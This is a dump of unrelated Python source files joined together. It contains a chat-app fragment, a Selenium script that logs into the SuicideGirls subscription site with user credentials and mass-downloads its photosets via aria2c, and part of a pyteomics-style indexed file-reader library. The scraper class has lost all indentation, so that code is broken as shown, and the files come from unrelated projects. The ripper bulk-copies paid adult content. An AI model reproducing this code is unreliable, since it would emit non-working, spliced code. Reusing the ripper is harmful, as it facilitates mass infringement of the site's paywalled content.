    args = parser.parse_args()
    # Override the module-level defaults with any supplied flags.
    if args.ipaddress:
        address=args.ipaddress
    if args.port:
        port=int(args.port)
    if args.username:
        username=args.username
    if args.server:
        server_func(address, port, username)
    elif args.client:
        client_func(address, port, username)
    else :
        print("Type python chat-app.py -h for usage information.")
        print("Ctrl + C to exit the program.")
        try :
            input()
        except KeyboardInterrupt:
            sys.exit()
|
runner.py | import time, subprocess, os.path, re, multiprocessing, threading
from . import manifest
from enum import Enum, auto
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Runner:
    """Translates parsed CLI args into a configured SuicideGirls rip run."""
    @classmethod
    # NOTE(review): the first parameter is conventionally `cls` for a
    # classmethod; it is named `self` here but receives the class object.
    def run(self, args, credentials):
        """Map args.type onto a rip type and URL list, then run the ripper.

        credentials is expected to be a mapping with "username"/"password".
        """
        urls = []
        # Shadows the builtin `type` within this method (pre-existing).
        type = None
        types = manifest.Manifest.types
        time_period_translations = manifest.Manifest.time_period_translations
        # args.type aliases come in pairs (long/short form) in `types`.
        if args.type in [types[0], types[1]]:
            type = "girl"
            for name in args.names:
                urls.append(name)
        elif args.type in [types[2], types[3]]:
            type = "hopeful"
            for name in args.names:
                urls.append(name)
        elif args.type in [types[4], types[5]]:
            type = "set"
            for url in args.urls:
                urls.append(url)
        elif args.type in [types[6], types[7]]:
            type = "girls"
            urls = ["https://www.suicidegirls.com/photos/"]
        elif args.type in [types[8], types[9]]:
            type = "hopefuls"
            urls = ["https://www.suicidegirls.com/photos/"]
        elif args.type in [types[10], types[11], types[12]]:
            type = "sotds"
            urls = ["https://www.suicidegirls.com/photos/"]
        elif args.type in [types[13], types[14]]:
            type = "all"
            urls = ["https://www.suicidegirls.com/photos/"]
        un = credentials["username"]
        pw = credentials["password"]
        #
        processed_args = (args.dir, args.processes, urls, type, time_period_translations[args.time_period], un, pw, args.interactive)
        sg = SuicideGirls(processed_args[5], processed_args[6], processed_args[7], processed_args[0], processed_args[1], processed_args[2], processed_args[3], processed_args[4])
        sg.startup()
        start = time.time()
        sg.rip()
        sg.shutdown()
        if(args.display_stats):
            # Wall-clock duration formatted as hh:mm:ss.
            end = time.time()
            duration = end - start
            seconds = duration % 60
            minutes = duration // 60
            hours = minutes // 60
            minutes = minutes % 60
            print("Time taken (hh:mm:ss): " + str(int(hours)).zfill(2) + ":" + str(int(minutes)).zfill(2) + ":" + str(int(seconds)).zfill(2))
class MediaType(Enum):
    """Kinds of downloadable media (not referenced in the visible code)."""
    IMAGE_ZIPS = auto()
    SINGLE_VIDEO = auto()
    VIDEO_CLIPS = auto()
class SuicideGirls:
driver = None
dispatcher_thread = None
argument_lists = []
stop_dispatching = False
def __init__(self, username, password, interactive, dir, process_limit, urls, type, time_period):
SuicideGirls.dispatcher_thread = threading.Thread(target=self.__dispatch)
self.root_url = "https://www.suicidegirls.com/"
self.username = username
self.password = password
self.exec_dir = "./"
self.girls_completed = 0
self.sets_completed = 0
if interactive:
self.build_interactive()
else:
self.dir = dir
self.process_limit = process_limit
self.__type = type
self.time_period = time_period
if type in ["girl", "hopeful"]:
self.urls = []
for url in urls:
self.urls.append(self.__build_url(url))
else:
self.urls = urls
SuicideGirls.dispatcher_thread.start()
def build_interactive(self):
print("Welcome to the Suicide Girls Plugin's interactive mode!")
print("You'll be asked a few questions before the plugin starts.")
print("(1/4) Where are we saving these photosets to?")
print("Default: " + os.path.abspath(os.path.dirname(self.exec_dir)))
self.dir = input("> ")
if self.dir is None or self.dir == "":
self.dir = os.path.abspath(os.path.dirname(self.exec_dir))
print("(2/4) How many ripping processes should be running?")
print("Default: 8")
self.process_limit = input("> ")
try:
self.process_limit = int(self.process_limit)
except ValueError:
self.process_limit = 8
choices = ["girl", "hopeful", "set", "all_girls", "all_hopefuls", "all_sets_of_the_day", "all"]
print("(3/4) What type of rip is this?")
print("Choices: " + ", ".join(choices))
print("Default: sets")
self.__type = input("> ")
if self.__type not in choices:
self.__type = "sets"
def __dispatch(self):
print("Beginning dispatcher thread...")
while not SuicideGirls.stop_dispatching or len(SuicideGirls.argument_lists) != 0:
if len(SuicideGirls.argument_lists) != 0:
print("Argument list found! Dispatching...")
argument_list = SuicideGirls.argument_lists.pop(0)
pool = multiprocessing.Pool(self.process_limit)
pool.map(self.download_image, argument_list)
print("Exiting dispatcher thread...")
def startup(self):
SuicideGirls.driver = webdriver.Chrome(executable_path="3rd-party-tools/chromedriver.exe")
SuicideGirls.driver.maximize_window()
SuicideGirls.driver.implicitly_wait(5)
SuicideGirls.driver.get(self.root_url)
self.__login()
def shutdown(self):
SuicideGirls.driver.quit()
def __login(self):
login_button_xpath = "//a[@class='login button' or @class='button login']"
login_form_submit_xpath = "//button[@type='submit' and text()='Login']"
username_box_xpath = "//input[@name='username']"
password_box_xpath = "//input[@name='password']"
SuicideGirls.driver.find_element_by_xpath(login_button_xpath).click()
SuicideGirls.driver.find_element_by_xpath(username_box_xpath).send_keys(self.username)
SuicideGirls.driver.find_element_by_xpath(password_box_xpath).send_keys(self.password)
SuicideGirls.driver.find_element_by_xpath(login_form_submit_xpath).click()
time.sleep(5)
flag = False
while True:
try:
image_select = SuicideGirls.driver.find_element_by_xpath("//iframe[@title='recaptcha challenge']")
if not flag:
print("Found a captcha!")
flag = True
except:
break
print("No captcha found!")
def rip(self):
for url in self.urls:
SuicideGirls.driver.get(url)
if self.__type == "girl":
print("Single girl")
self.__rip_girl()
elif self.__type == "girls":
print("All Suicide Girls")
self.__rip_all_girls()
elif self.__type == "hopefuls":
print("All hopefuls")
self.__rip_all_hopefuls()
elif self.__type == "sotds":
print("All sets of the day")
self.__rip_all_sets_of_the_day()
elif self.__type == "set":
print("Single set")
self.__rip_set()
elif self.__type == "all":
print("All!")
self.__rip_all_photos()
SuicideGirls.stop_dispatching = True
SuicideGirls.dispatcher_thread.join()
print("Rip completed.")
print("Total girls/hopefuls ripped: " + str(self.girls_completed))
print("Total sets ripped: " + str(self.sets_completed))
def __rip_all_photos(self):
SuicideGirls.driver.get(self.urls[0])
self.__type = "hopefuls"
self.__rip_all_hopefuls()
SuicideGirls.driver.get(self.urls[0])
self.__type = "girls"
self.__rip_all_girls()
SuicideGirls.driver.get(self.urls[0])
self.__type = "sotds"
self.__rip_all_sets_of_the_day()
def __rip_all_girls(self):
suicide_girls_xpath = "//li[@class='dropdown'][1]//ul/li/a[text() = 'SuicideGirls']"
self.__rip_all(suicide_girls_xpath)
def __rip_all_hopefuls(self):
hopefuls_xpath = "//li[@class='dropdown'][1]//ul/li/a[text() = 'Hopefuls']"
self.__rip_all(hopefuls_xpath)
def __rip_all_sets_of_the_day(self):
sotds_xpath = "//li[@class='dropdown'][1]//ul/li/a[text() = 'Sets Of The Day']"
self.__rip_all(sotds_xpath)
def __rip_all(self, type_xpath):
time_period_xpath = "//li[@class='dropdown'][3]//ul/li/a[text() = '" + self.time_period + "']"
girl_name_xpath = "//article/header//h2/a"
load_more_xpath = "//a[@id='load-more']"
choice = SuicideGirls.driver.find_element_by_xpath(type_xpath)
SuicideGirls.driver.get(choice.get_attribute("href"))
choice = SuicideGirls.driver.find_element_by_xpath(time_period_xpath)
SuicideGirls.driver.get(choice.get_attribute("href"))
girls = []
iteration = 0
while True:
iteration += 1
names = SuicideGirls.driver.find_elements_by_xpath(girl_name_xpath)
for name in names:
girls.append(name.text)
if iteration > 1:
SuicideGirls.driver.execute_script("for(i=0;i<24;i++) {e = document.evaluate(\"//article[1]\", document.documentElement); e = e.iterateNext(); if (e == null) {break;}e.parentNode.removeChild(e);}")
time.sleep(2)
lmb = SuicideGirls.driver.find_elements_by_xpath(load_more_xpath)
if len(lmb) > 0 and lmb[0].is_displayed():
lmb[0].click()
time.sleep(10)
else:
break
girls = list(set(girls))
for girl in sorted(girls):
url = self.__build_url(girl)
SuicideGirls.driver.get(url)
self.__rip_girl()
def __rip_girl(self):
load_more_xpath = "//a[@id='load-more']"
photos_xpath = "//div[@id='content-container']//a[text()='Photos']"
photosets_xpath = "//div[@id='content-container']//a[text()='Photosets']"
set_title_xpath = "//article/header//h2/a"
url = SuicideGirls.driver.find_element_by_xpath(photos_xpath).get_attribute("href")
SuicideGirls.driver.get(url)
url = SuicideGirls.driver.find_element_by_xpath(photosets_xpath).get_attribute("href")
SuicideGirls.driver.get(url)
set_links = []
iteration = 0
while True:
iteration += 1
titles = SuicideGirls.driver.find_elements_by_xpath(set_title_xpath)
for title in titles:
set_links.append(title.get_attribute("href"))
if iteration > 1:
SuicideGirls.driver.execute_script("for(i=0;i<9;i++) {e = document.evaluate(\"//article[1]\", document.documentElement); e = e.iterateNext(); if (e == null) {break;}e.parentNode.removeChild(e);}")
time.sleep(2)
lmb = SuicideGirls.driver.find_elements_by_xpath(load_more_xpath)
if len(lmb) > 0 and lmb[0].is_displayed():
lmb[0].click()
time.sleep(10)
else:
break
set_links = list(set(set_links))
for link in set_links:
SuicideGirls.driver.get(link)
self.__rip_set()
self.girls_completed += 1
def __rip_set(self):
girl_xpath = "//h1/a"
title_xpath = "//header[@class='header']/div[@class='top-bar']/h2[@class='title']"
full_image_button_xpath = "//a[@id='button-view_full_size']"
full_image_url_xpath = "//div[@data-image_url]"
girl = SuicideGirls.driver.find_element_by_xpath(girl_xpath).text
title = SuicideGirls.driver.find_element_by_xpath(title_xpath).text
dir_name = os.path.join("Suicide Girls", girl.title(), title.title())
dir_name = re.subn("[<>:\"/\|?*]", "", dir_name)[0]
dir_name = re.subn("\\.{3,}", "…", dir_name)[0]
dir_name = os.path.join(self.dir, dir_name)
check = False
if os.path.exists(dir_name):
check = True
SuicideGirls.driver.find_element_by_xpath(full_image_button_xpath).click()
time.sleep(5)
images = SuicideGirls.driver.find_elements_by_xpath(full_image_url_xpath)
image_urls = []
for i in range(0, len(images)):
url = images[i].get_attribute("data-image_url")
ext = url[url.rindex("."):]
file_name = "Suicide Girls - " + girl.title() + " - " + title.title() + " - Img" + str(i + 1).zfill(3) + ext
file_name = re.subn("[<>:\"/\|?*]", "", file_name)[0]
file_name = re.subn("\\.{3,}", "…", file_name)[0]
if not os.path.exists(os.path.join(dir_name, file_name)):
image_urls.append(url)
else:
print(girl.title() + "/" + title.title() + " Img" + str(i).zfill(3) + " already exists, skipping...")
self.__download_and_save_set(image_urls, girl, title)
self.sets_completed += 1
def __download_and_save_set(self, urls, girl, title):
    """Queue aria2c download commands for every image URL in *urls*.

    Builds one (error_list, command, number, url, girl, title) tuple per
    image that is not yet on disk and appends the batch to the class-level
    ``SuicideGirls.argument_lists``.  If any errors were recorded, writes
    them to ``errors.txt`` inside the set directory.
    """
    aria_path = os.path.join(self.exec_dir, "3rd-party-tools", "aria2", "aria2c.exe")
    error_strings = []
    # Same Windows-safe path sanitization as in __rip_set.
    dir_name = os.path.join("Suicide Girls", girl.title(), title.title())
    dir_name = re.subn("[<>:\"/\|?*]", "", dir_name)[0]
    dir_name = re.subn("\\.{3,}", "…", dir_name)[0]
    dir_name = os.path.join(self.dir, dir_name)
    # Bug fix: a multiprocessing.Pool(8) was created here but never used,
    # spawning 8 idle worker processes per set; removed.
    args = []
    for i in range(0, len(urls)):
        command = [aria_path, "-d", dir_name, "-o"]
        ext = urls[i][urls[i].rindex("."):]
        file_name = "Suicide Girls - " + girl.title() + " - " + title.title() + " - Img" + str(i + 1).zfill(3) + ext
        file_name = re.subn("[<>:\"/\|?*]", "", file_name)[0]
        file_name = re.subn("\\.{3,}", "…", file_name)[0]
        # Bug fix: was `dir_name + file_name` (missing path separator), so
        # the existence check never matched and files were re-downloaded.
        if os.path.exists(os.path.join(dir_name, file_name)):
            continue
        command.append(file_name)
        command.append(urls[i])
        args.append((error_strings, command, str(i + 1), urls[i], girl, title))
    SuicideGirls.argument_lists.append(args)
    if len(error_strings) > 0:
        # Bug fix: was open(os.path.join(dir_name, "errors.txt", "w")) --
        # the mode string was passed to os.path.join, producing a bogus
        # path and no mode; use a context manager so the file is closed.
        with open(os.path.join(dir_name, "errors.txt"), "w") as f:
            f.write("\n".join(sorted(error_strings)))
def __build_url(self, name):
    """Return the suicidegirls.com profile URL for *name*, chosen by the
    configured account type; returns None for an unrecognized type."""
    base = "https://www.suicidegirls.com/"
    if self.__type in ["girl", "girls", "sotds"]:
        return base + "girls/" + name
    if self.__type in ["hopeful", "hopefuls"]:
        return base + "members/" + name
def download_image(self, args):
    """Run a single aria2c download described by *args*.

    *args* is a tuple of (error_list, command, image_number, url, girl,
    title).  On a non-zero exit code an error line is appended to
    error_list; a completion message is printed either way.
    """
    error_list, command, number, url, girl, title = args
    completed = subprocess.run(command)
    if completed.returncode != 0:
        error_list.append("\tImage " + number + " failed; URL: " + url)
    print(girl.title() + "/" + title.title() + " #" + number + " complete")
def print_warning():
    """Tell the user this module is import-only and should not be executed."""
    message = "This file is meant to be imported by other Python files, not run directly. Exiting now."
    print(message)
if __name__ == "__main__":
    # Import-only module: running it directly just prints the warning above.
    print_warning()
|
file_helpers.py | import sys
import codecs
import re
from functools import wraps
from contextlib import contextmanager
from collections import OrderedDict, defaultdict
import json
import multiprocessing as mp
import threading
import warnings
import os
try:
basestring
except NameError:
basestring = (str, bytes)
try:
import pandas as pd
except ImportError:
pd = None
try:
import numpy as np
except ImportError:
np = None
try:
import dill
except ImportError:
dill = None
try:
import cPickle as pickle
except ImportError:
import pickle
serializer = pickle
else:
serializer = dill
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
from collections.abc import Sequence
except ImportError:
from collections import Sequence
from . import PyteomicsError
def _keepstate(func):
    """Decorator to help keep the position in open files passed as
    positional arguments to functions.

    Each positional argument exposing both ``seek`` and ``tell`` is rewound
    to the start before the call and restored to its previous position
    afterwards.  Restoration errors on closed streams are ignored.
    """
    @wraps(func)
    def wrapped(*args, **kwargs):
        # For each arg: its tell() position if it is seekable, else None.
        saved = [getattr(arg, 'seek', None) and getattr(arg, 'tell', type(None))() for arg in args]
        for arg, pos in zip(args, saved):
            if pos is not None:
                arg.seek(0)
        result = func(*args, **kwargs)
        for arg, pos in zip(args, saved):
            if pos is None:
                continue
            try:
                arg.seek(pos)
            except ValueError:
                # the stream may have been closed inside func; nothing to restore
                pass
        return result
    return wrapped
def _keepstate_method(func):
    """Decorator for :py:class:`FileReader` methods to help keep the position
    in the underlying file.

    Runs the method with the reader rewound to the start, then restores the
    previous position even if the method raises.
    """
    @wraps(func)
    def wrapped(self, *args, **kwargs):
        saved_position = self.tell()
        self.seek(0)
        try:
            return func(self, *args, **kwargs)
        finally:
            self.seek(saved_position)
    return wrapped
class _file_obj(object):
    """Check if `f` is a file name and open the file in `mode`.
    A context manager.

    Accepts a path (opened via :func:`codecs.open` and closed on exit),
    ``None`` (maps to stdin/stdout depending on *mode*), or an existing
    file object (used as-is and never closed on exit).
    """
    def __init__(self, f, mode, encoding=None):
        self._file_spec = None
        self.mode = mode
        if f is None:
            # no file given: fall back to the standard streams
            self.file = {'r': sys.stdin, 'a': sys.stdout, 'w': sys.stdout
                         }[mode[0]]
            self._file_spec = None
        elif isinstance(f, basestring):
            # a file name: open it ourselves (and close it on exit)
            self.file = codecs.open(f, mode, encoding)
            self._file_spec = f
        else:
            # an already-open file object: wrap it, never close it
            self._file_spec = f
            self.file = f
        self.encoding = getattr(self.file, 'encoding', encoding)
        # True only when we opened the file here (f was a name)
        self.close_file = (self.file is not f)

    def __enter__(self):
        return self

    def __reduce_ex__(self, protocol):
        # pickle by re-creating from the original spec (path/object/None)
        return self.__class__, (self._file_spec, self.mode, self.encoding)

    def __exit__(self, *args, **kwargs):
        if (not self.close_file) or self._file_spec is None:
            return  # do nothing: we do not own the underlying stream
        # clean up: prefer the file's own __exit__, fall back to close()
        exit = getattr(self.file, '__exit__', None)
        if exit is not None:
            return exit(*args, **kwargs)
        else:
            exit = getattr(self.file, 'close', None)
            if exit is not None:
                exit()

    def __getattr__(self, attr):
        # delegate all unknown attributes to the wrapped file object
        return getattr(self.file, attr)

    def __iter__(self):
        return iter(self.file)
class NoOpBaseReader(object):
    """Terminal base class for the reader mixin hierarchy.

    Swallows any constructor arguments so cooperative ``super().__init__``
    chains can safely end here.
    """
    def __init__(self, *args, **kwargs):
        pass
class IteratorContextManager(NoOpBaseReader):
    """Context-manager wrapper around the iterator produced by ``parser_func``.

    ``parser_func`` is called with the stored positional and keyword
    arguments to (re)create the underlying iterator.
    """
    def __init__(self, *args, **kwargs):
        self._func = kwargs.pop('parser_func')  # callable that builds the iterator
        self._args = args
        self._kwargs = kwargs
        if type(self) == IteratorContextManager:
            # only reset here for direct instantiation; subclasses
            # (e.g. FileReader) call reset() after their own setup
            self.reset()
        super(IteratorContextManager, self).__init__(*args, **kwargs)

    def __getstate__(self):
        # only the creation arguments are pickled, not the live iterator
        state = {}
        state['_iterator_args'] = self._args
        state['_iterator_kwargs'] = self._kwargs
        return state

    def __setstate__(self, state):
        self._args = state['_iterator_args']
        self._kwargs = state['_iterator_kwargs']

    def reset(self):
        """Resets the iterator to its initial state."""
        try:
            self._reader = self._func(*self._args, **self._kwargs)
        except Exception:
            self.__exit__(*sys.exc_info())
            raise

    def __enter__(self):
        return self

    def __exit__(self, *args, **kwargs):
        pass

    def __iter__(self):
        return self

    def __next__(self):
        # StopIteration propagates to the caller; no implicit __exit__ here
        return next(self._reader)

    next = __next__  # Python 2 compatibility
class FileReader(IteratorContextManager):
    """Abstract class implementing context manager protocol
    for file readers.

    Required keys in ``kwargs``: ``parser_func``, ``args``, ``kwargs``,
    ``pass_file`` and ``mode``; ``encoding`` is optional.
    """
    def __init__(self, source, **kwargs):
        func = kwargs['parser_func']
        super(FileReader, self).__init__(*kwargs['args'], parser_func=func, **kwargs['kwargs'])
        self._pass_file = kwargs['pass_file']  # whether parser_func takes the open file first
        self._source_init = source  # original spec kept so reset() can reopen
        self._mode = kwargs['mode']
        self._encoding = kwargs.get('encoding')
        self.reset()

    def reset(self):
        """Close the current source (if any), reopen it and recreate the
        underlying iterator."""
        if hasattr(self, '_source'):
            self._source.__exit__(None, None, None)
        self._source = _file_obj(self._source_init, self._mode, self._encoding)
        try:
            if self._pass_file:
                self._reader = self._func(
                    self._source, *self._args, **self._kwargs)
            else:
                self._reader = self._func(*self._args, **self._kwargs)
        except Exception:  # clean up on any error
            self.__exit__(*sys.exc_info())
            raise

    def __exit__(self, *args, **kwargs):
        self._source.__exit__(*args, **kwargs)

    # delegate everything else to file object
    def __getattr__(self, attr):
        if attr == '_source':
            # guard against infinite recursion before _source is assigned
            raise AttributeError
        return getattr(self._source, attr)
def remove_bom(bstr):
    """Strip little-endian BOM markers (all occurrences) and any leading
    NUL bytes from the byte string *bstr*."""
    without_bom = bstr.replace(codecs.BOM_LE, b'')
    return without_bom.lstrip(b"\x00")
class IndexedReaderMixin(NoOpBaseReader):
    """Common interface for :py:class:`IndexedTextReader` and :py:class:`IndexedXML`."""
    @property
    def index(self):
        # the offset index mapping record IDs to byte ranges
        return self._offset_index

    @property
    def default_index(self):
        # index used for lookups; same as `index` here, subclasses may override
        return self._offset_index

    def __len__(self):
        return len(self._offset_index)

    def __contains__(self, key):
        return key in self._offset_index

    def _item_from_offsets(self, offsets):
        # subclasses parse and return the record stored at the given byte range
        raise NotImplementedError

    def get_by_id(self, elem_id):
        """Return the parsed record with ID *elem_id* using the offset index."""
        index = self.default_index
        if index is None:
            raise PyteomicsError('Access by ID requires building an offset index.')
        offsets = index[elem_id]
        return self._item_from_offsets(offsets)

    def get_by_ids(self, ids):
        """Return a list of records for the given iterable of IDs."""
        return [self.get_by_id(key) for key in ids]

    def get_by_index(self, i):
        """Return the record at ordinal position *i* of the index."""
        try:
            key = self.default_index.from_index(i, False)
        except AttributeError:
            # default_index is None, so it has no from_index()
            raise PyteomicsError('Positional access requires building an offset index.')
        return self.get_by_id(key)

    def get_by_indexes(self, indexes):
        """Return records for a sequence of ordinal positions."""
        return [self.get_by_index(i) for i in indexes]

    def get_by_index_slice(self, s):
        """Return records for a slice of ordinal positions."""
        try:
            keys = self.default_index.from_slice(s, False)
        except AttributeError:
            raise PyteomicsError('Positional access requires building an offset index.')
        return self.get_by_ids(keys)

    def get_by_key_slice(self, s):
        """Return records between keys ``s.start`` and ``s.stop`` (inclusive),
        optionally strided by ``s.step``."""
        keys = self.default_index.between(s.start, s.stop)
        if s.step:
            keys = keys[::s.step]
        return self.get_by_ids(keys)

    def __getitem__(self, key):
        # Dispatch on key type: ID string, ordinal int, sequence of either,
        # or a slice (typed by its first non-None component).
        if isinstance(key, basestring):
            return self.get_by_id(key)
        if isinstance(key, int):
            return self.get_by_index(key)
        if isinstance(key, Sequence):
            if not key:
                return []
            if isinstance(key[0], int):
                return self.get_by_indexes(key)
            if isinstance(key[0], basestring):
                return self.get_by_ids(key)
        if isinstance(key, slice):
            for item in (key.start, key.stop, key.step):
                if item is not None:
                    break
            if isinstance(item, int):
                return self.get_by_index_slice(key)
            if isinstance(item, basestring):
                return self.get_by_key_slice(key)
            if item is None:
                # slice(None, None, None): return every record
                return list(self)
        raise PyteomicsError('Unsupported query key: {}'.format(key))
class RTLocator():
    """Helper that locates scans by retention time using binary search over
    the reader's offset index (which must be time-ordered)."""
    def __init__(self, reader):
        self._reader = reader

    def _get_scan_by_time(self, time):
        """Retrieve the scan object for the specified scan time.
        Parameters
        ----------
        time : float
            The time to get the nearest scan from
        Returns
        -------
        tuple: (scan_id, scan, scan_time)
        """
        if not self._reader.default_index:
            raise PyteomicsError("This method requires the index. Please pass `use_index=True` during initialization")
        scan_ids = tuple(self._reader.default_index)
        lo = 0
        hi = len(scan_ids)
        # track the closest scan seen so far during the search
        best_match = None
        best_error = float('inf')
        best_time = None
        best_id = None
        if time == float('inf'):
            # shortcut: infinite time maps to the last scan
            scan = self._reader.get_by_id(scan_ids[-1])
            return scan_ids[-1], scan, self._reader._get_time(scan)
        # binary search; returns either an exact hit or the best candidate
        # once the interval narrows to a single element
        while hi != lo:
            mid = (hi + lo) // 2
            sid = scan_ids[mid]
            scan = self._reader.get_by_id(sid)
            scan_time = self._reader._get_time(scan)
            err = abs(scan_time - time)
            if err < best_error:
                best_error = err
                best_match = scan
                best_time = scan_time
                best_id = sid
            if scan_time == time:
                return sid, scan, scan_time
            elif (hi - lo) == 1:
                return best_id, best_match, best_time
            elif scan_time > time:
                hi = mid
            else:
                lo = mid

    def __getitem__(self, key):
        # scalar time, sequence of times, or a slice of times
        if isinstance(key, (int, float)):
            return self._get_scan_by_time(key)[1]
        if isinstance(key, Sequence):
            return [self._get_scan_by_time(t)[1] for t in key]
        if isinstance(key, slice):
            # resolve missing bounds to the first/last indexed scan IDs
            if key.start is None:
                start_index = self._reader.default_index.from_index(0)
            else:
                start_index = self._get_scan_by_time(key.start)[0]
            if key.stop is None:
                stop_index = self._reader.default_index.from_index(-1)
            else:
                stop_index = self._get_scan_by_time(key.stop)[0]
            return self._reader[start_index:stop_index:key.step]
class TimeOrderedIndexedReaderMixin(IndexedReaderMixin):
    """Indexed reader whose records are ordered by retention time; adds a
    :attr:`time` locator for time-based lookups."""
    def __init__(self, *args, **kwargs):
        super(TimeOrderedIndexedReaderMixin, self).__init__(*args, **kwargs)
        # RTLocator binary-searches scan times obtained via _get_time()
        self._time = RTLocator(self)

    @property
    def time(self):
        """An :class:`RTLocator` querying records by retention time."""
        return self._time

    @staticmethod
    def _get_time(scan):
        # subclasses must extract the retention time from a scan record
        raise NotImplementedError
class IndexedTextReader(IndexedReaderMixin, FileReader):
    """Abstract class for text file readers that keep an index of records for random access.
    This requires reading the file in binary mode."""
    delimiter = None      # record separator string (class-level default)
    label = None          # regex whose group `label_group` captures the record ID
    block_size = 1000000  # bytes read per chunk while building the index
    label_group = 1       # regex group number holding the record ID

    def __init__(self, source, **kwargs):
        # the underlying _file_obj gets None as encoding
        # to avoid transparent decoding of StreamReader on read() calls
        encoding = kwargs.pop('encoding', 'utf-8')
        super(IndexedTextReader, self).__init__(source, mode='rb', encoding=None, **kwargs)
        self.encoding = encoding
        # allow per-instance overrides of the class-level parsing parameters
        for attr in ['delimiter', 'label', 'block_size', 'label_group']:
            if attr in kwargs:
                setattr(self, attr, kwargs.pop(attr))
        self._offset_index = None
        if not kwargs.pop('_skip_index', False):
            self._offset_index = self.build_byte_index()

    def __getstate__(self):
        state = super(IndexedTextReader, self).__getstate__()
        state['offset_index'] = self._offset_index
        return state

    def __setstate__(self, state):
        super(IndexedTextReader, self).__setstate__(state)
        self._offset_index = state['offset_index']

    def _chunk_iterator(self):
        """Yield the file's content split on ``delimiter``, reading it in
        ``block_size`` chunks; every yielded piece except possibly the first
        starts with the delimiter."""
        fh = self._source.file
        delim = remove_bom(self.delimiter.encode(self.encoding))
        buff = fh.read(self.block_size)
        parts = buff.split(delim)
        started_with_delim = buff.startswith(delim)
        # the last split part may be cut mid-record; carry it into the next read
        tail = parts[-1]
        front = parts[:-1]
        i = 0
        for part in front:
            i += 1
            if part == b"":
                continue
            if i == 1:
                # first piece only carries the delimiter if the file started with one
                if started_with_delim:
                    yield delim + part
                else:
                    yield part
            else:
                yield delim + part
        running = True
        while running:
            buff = fh.read(self.block_size)
            if len(buff) == 0:
                # EOF: flush the carried-over tail as the final buffer
                running = False
                buff = tail
            else:
                buff = tail + buff
            parts = buff.split(delim)
            tail = parts[-1]
            front = parts[:-1]
            for part in front:
                yield delim + part
        yield delim + tail

    def _generate_offsets(self):
        """Yield (byte_offset, record_id, match) per record; a final
        (file_size, None, None) sentinel marks the end of the file."""
        i = 0
        pattern = re.compile(remove_bom(self.label.encode(self.encoding)))
        for chunk in self._chunk_iterator():
            match = pattern.search(chunk)
            if match:
                label = match.group(self.label_group)
                yield i, label.decode(self.encoding), match
            i += len(chunk)
        yield i, None, None

    def build_byte_index(self):
        """Scan the file once and return an :class:`OffsetIndex` mapping
        record IDs to (start, end) byte ranges."""
        index = OffsetIndex()
        g = self._generate_offsets()
        last_offset = 0
        last_label = None
        # pair each record's offset with the next record's offset
        for offset, label, keyline in g:
            if last_label is not None:
                index[last_label] = (last_offset, offset)
            last_label = label
            last_offset = offset
        # the generator's final sentinel guarantees we end on label=None
        assert last_label is None
        return index

    def _read_lines_from_offsets(self, start, end):
        """Read the byte range [start, end), decode it and return its lines."""
        self._source.seek(start)
        lines = self._source.read(end - start).decode(self.encoding).split('\n')
        return lines
class IndexSavingMixin(NoOpBaseReader):
    """Common interface for :py:class:`IndexSavingXML` and :py:class:`IndexSavingTextReader`."""
    _index_class = NotImplemented  # WritableIndex subclass used for (de)serialization

    @property
    def _byte_offset_filename(self):
        """Path of the sidecar index file, ``<name>-<ext>-byte-offsets.json``,
        or None when the source has no file name (e.g. an in-memory stream)."""
        try:
            path = self._source.name
        except AttributeError:
            return None
        name, ext = os.path.splitext(path)
        byte_offset_filename = '{}-{}-byte-offsets.json'.format(name, ext[1:])
        return byte_offset_filename

    def _check_has_byte_offset_file(self):
        """Check if the file at :attr:`_byte_offset_filename` exists
        Returns
        -------
        bool
            Whether the file exists
        """
        path = self._byte_offset_filename
        if path is None:
            return False
        return os.path.exists(path)

    @classmethod
    def prebuild_byte_offset_file(cls, path):
        """Construct a new XML reader, build its byte offset index and
        write it to file
        Parameters
        ----------
        path : str
            The path to the file to parse
        """
        with cls(path) as inst:
            inst.write_byte_offsets()

    def write_byte_offsets(self):
        """Write the byte offsets in :attr:`_offset_index` to the file
        at :attr:`_byte_offset_filename`
        """
        with open(self._byte_offset_filename, 'w') as f:
            self._offset_index.save(f)

    @_keepstate_method
    def _build_index(self):
        """Build the byte offset index by either reading these offsets
        from the file at :attr:`_byte_offset_filename`, or falling back
        to the method used by :class:`IndexedXML` if this operation fails
        due to an IOError
        """
        if not self._use_index: return
        try:
            self._read_byte_offsets()
        except (IOError, AttributeError, TypeError):
            # missing/invalid sidecar file: rebuild from the source itself
            super(IndexSavingMixin, self)._build_index()

    def _read_byte_offsets(self):
        """Read the byte offset index JSON file at :attr:`_byte_offset_filename`
        and populate :attr:`_offset_index`
        """
        with open(self._byte_offset_filename, 'r') as f:
            index = self._index_class.load(f)
            self._offset_index = index
def _file_reader(_mode='r'):
    # a lot of the code below is borrowed from
    # http://stackoverflow.com/a/14095585/1258041
    def decorator(_func):
        """A decorator implementing the context manager protocol for functions
        that read files.
        Note: 'close' must be in kwargs! Otherwise it won't be respected.
        """
        @wraps(_func)
        def helper(*args, **kwargs):
            # 'encoding' is consumed here so it never reaches the parser kwargs
            encoding = kwargs.pop('encoding', None)
            if args:
                source, positional = args[0], args[1:]
            else:
                source, positional = kwargs.pop('source', None), ()
            return FileReader(source, mode=_mode, parser_func=_func, pass_file=True,
                              args=positional, kwargs=kwargs, encoding=encoding)
        return helper
    return decorator
def _file_writer(_mode='a'):
    def decorator(_func):
        """A decorator that opens output files for writer functions.
        """
        @wraps(_func)
        def helper(*args, **kwargs):
            mode = kwargs.pop('file_mode', _mode)
            encoding = kwargs.pop('encoding', None)
            if len(args) > 1:
                # output target supplied positionally as the second argument
                with _file_obj(args[1], mode, encoding=encoding) as out:
                    return _func(args[0], out, *args[2:], **kwargs)
            # otherwise take it from the 'output' keyword (or stdout via None)
            with _file_obj(kwargs.pop('output', None), mode, encoding=encoding) as out:
                return _func(*args, output=out, **kwargs)
        return helper
    return decorator
class WritableIndex(object):
    """Mixin adding JSON (de)serialization to index mappings.

    Concrete subclasses must behave like mappings (provide ``items()`` and a
    constructor accepting an iterable of key/value pairs).
    """
    schema_version = (1, 0, 0)
    _schema_version_tag_key = "@pyteomics_schema_version"

    def _serializable_container(self):
        container = {'index': list(self.items())}
        return container

    def save(self, fp):
        """Dump this index plus its schema version tag to *fp* as JSON."""
        container = self._serializable_container()
